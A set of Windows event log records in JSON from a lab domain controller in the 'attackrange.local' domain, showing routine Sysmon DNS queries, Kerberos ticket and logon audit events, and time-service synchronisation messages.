{"EventTime":"2020-08-01 07:53:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2638,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:50.553\r\nProcessGuid: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nProcessId: 1312\r\nQueryName: win-dc-6178966.attackrange.local\r\nQueryStatus: 0\r\nQueryResults: fe80::2:3a1d:f5ff:fef1;fe80::286a:52de:ea43:8266;::ffff:10.0.1.14;\r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:50.553","ProcessGuid":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","QueryName":"win-dc-6178966.attackrange.local","QueryStatus":"0","QueryResults":"fe80::2:3a1d:f5ff:fef1;fe80::286a:52de:ea43:8266;::ffff:10.0.1.14;","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 07:53:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2639,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:50.659\r\nProcessGuid: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nProcessId: 1312\r\nQueryName: vhcpkpih\r\nQueryStatus: 1460\r\nQueryResults: \r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:50.659","ProcessGuid":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","QueryName":"vhcpkpih","QueryStatus":"1460","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 07:53:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2640,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:50.659\r\nProcessGuid: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nProcessId: 1312\r\nQueryName: us-east-2.compute.internal\r\nQueryStatus: 1460\r\nQueryResults: \r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:50.659","ProcessGuid":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","QueryName":"us-east-2.compute.internal","QueryStatus":"1460","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 07:53:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2641,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:50.680\r\nProcessGuid: {41C8662E-1F63-5F25-0000-001044B90000}\r\nProcessId: 1140\r\nQueryName: isatap.us-east-2.compute.internal\r\nQueryStatus: 9003\r\nQueryResults: \r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:50.680","ProcessGuid":"{41C8662E-1F63-5F25-0000-001044B90000}","QueryName":"isatap.us-east-2.compute.internal","QueryStatus":"9003","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 07:53:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2642,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:50.756\r\nProcessGuid: {41C8662E-1F61-5F25-0000-001010540000}\r\nProcessId: 864\r\nQueryName: _ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.\r\nQueryStatus: 0\r\nQueryResults: type:  33 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:50.756","ProcessGuid":"{41C8662E-1F61-5F25-0000-001010540000}","QueryName":"_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.","QueryStatus":"0","QueryResults":"type:  33 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 07:53:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:52","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":37,"SourceName":"Microsoft-Windows-Time-Service","ProviderGuid":"{06EDCFEB-0FD0-4E53-ACCA-A6F8BBF81BCB}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76840,"ProcessID":1216,"ThreadID":1896,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"The time provider NtpClient is currently receiving valid time data from time.windows.com,0x8 (ntp.m|0x8|0.0.0.0:123->13.86.101.172:123).","Opcode":"Info","TimeSource":"time.windows.com,0x8 (ntp.m|0x8|0.0.0.0:123-&gt;13.86.101.172:123)","EventReceivedTime":"2020-08-01 07:53:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:52","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2643,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:50.760\r\nProcessGuid: {41C8662E-1F61-5F25-0000-001010540000}\r\nProcessId: 864\r\nQueryName: _ldap._tcp.dc._msdcs.attackrange.local.\r\nQueryStatus: 0\r\nQueryResults: type:  33 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:50.760","ProcessGuid":"{41C8662E-1F61-5F25-0000-001010540000}","QueryName":"_ldap._tcp.dc._msdcs.attackrange.local.","QueryStatus":"0","QueryResults":"type:  33 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 07:53:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:52","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2644,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:50.760\r\nProcessGuid: {41C8662E-1F61-5F25-0000-001010540000}\r\nProcessId: 864\r\nQueryName: _ldap._tcp.ac1b7fb6-7367-47ee-8baf-93da4715dbae.domains._msdcs.attackrange.local.\r\nQueryStatus: 0\r\nQueryResults: type:  33 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:50.760","ProcessGuid":"{41C8662E-1F61-5F25-0000-001010540000}","QueryName":"_ldap._tcp.ac1b7fb6-7367-47ee-8baf-93da4715dbae.domains._msdcs.attackrange.local.","QueryStatus":"0","QueryResults":"type:  33 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 07:53:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:53","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2645,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:50.773\r\nProcessGuid: {41C8662E-1F63-5F25-0000-0010BCC20000}\r\nProcessId: 1216\r\nQueryName: wpad\r\nQueryStatus: 9003\r\nQueryResults: \r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:50.773","ProcessGuid":"{41C8662E-1F63-5F25-0000-0010BCC20000}","QueryName":"wpad","QueryStatus":"9003","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 07:53:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:53","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2646,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:51.595\r\nProcessGuid: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nProcessId: 1312\r\nQueryName: win-dc-6178966\r\nQueryStatus: 1460\r\nQueryResults: \r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:51.595","ProcessGuid":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","QueryName":"win-dc-6178966","QueryStatus":"1460","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 07:53:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:53","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2647,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:53.766\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\kerberos.DLL+96ea2|C:\\Windows\\system32\\kerberos.DLL+79354|C:\\Windows\\system32\\kerberos.DLL+13948|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+2c2c4|C:\\Windows\\system32\\lsasrv.dll+31375|C:\\Windows\\system32\\lsasrv.dll+2f20b|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+16cdd|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1a96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:53.766","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\kerberos.DLL+96ea2|C:\\Windows\\system32\\kerberos.DLL+79354|C:\\Windows\\system32\\kerberos.DLL+13948|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+2c2c4|C:\\Windows\\system32\\lsasrv.dll+31375|C:\\Windows\\system32\\lsasrv.dll+2f20b|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+16cdd|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1a96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","EventReceivedTime":"2020-08-01 07:53:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:53","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220386,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tWIN-DC-6178966$@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{AF6F81D5-4DEB-1667-6D57-060EF585B6D6}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"WIN-DC-6178966$@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{AF6F81D5-4DEB-1667-6D57-060EF585B6D6}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:53:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:53","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220387,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tWIN-DC-6178966$@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{AF6F81D5-4DEB-1667-6D57-060EF585B6D6}\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x60810010\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"WIN-DC-6178966$@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x60810010","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{AF6F81D5-4DEB-1667-6D57-060EF585B6D6}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:53:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:53","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220388,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4CBBF\r\n\r\nPrivileges:\t\tSeAuditPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeAssignPrimaryTokenPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x4cbbf","PrivilegeList":"SeAuditPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeAssignPrimaryTokenPrivilege","EventReceivedTime":"2020-08-01 07:53:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:53","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220389,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tDelegation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x4CBBF\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{B1C25BD8-87FD-C382-C5BF-7EF769D9E684}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x4cbbf","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{B1C25BD8-87FD-C382-C5BF-7EF769D9E684}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1840","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:53:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":37,"SourceName":"Microsoft-Windows-Time-Service","ProviderGuid":"{06EDCFEB-0FD0-4E53-ACCA-A6F8BBF81BCB}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76841,"ProcessID":1216,"ThreadID":1896,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"The time provider NtpClient is currently receiving valid time data from time.windows.com,0x8 (ntp.m|0x8|0.0.0.0:123->13.86.101.172:123).","Opcode":"Info","TimeSource":"time.windows.com,0x8 (ntp.m|0x8|0.0.0.0:123-&gt;13.86.101.172:123)","EventReceivedTime":"2020-08-01 07:53:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":144,"SourceName":"Microsoft-Windows-Time-Service","ProviderGuid":"{06EDCFEB-0FD0-4E53-ACCA-A6F8BBF81BCB}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76842,"ProcessID":1216,"ThreadID":2604,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"The time service has stopped advertising as a good time source.","Opcode":"Info","EventReceivedTime":"2020-08-01 07:53:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":35,"SourceName":"Microsoft-Windows-Time-Service","ProviderGuid":"{06EDCFEB-0FD0-4E53-ACCA-A6F8BBF81BCB}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76843,"ProcessID":1216,"ThreadID":2604,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"The time service is now synchronizing the system time with the time source time.windows.com,0x8 (ntp.m|0x8|0.0.0.0:123->13.86.101.172:123).","Opcode":"Info","TimeSource":"time.windows.com,0x8 (ntp.m|0x8|0.0.0.0:123-&gt;13.86.101.172:123)","EventReceivedTime":"2020-08-01 07:53:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
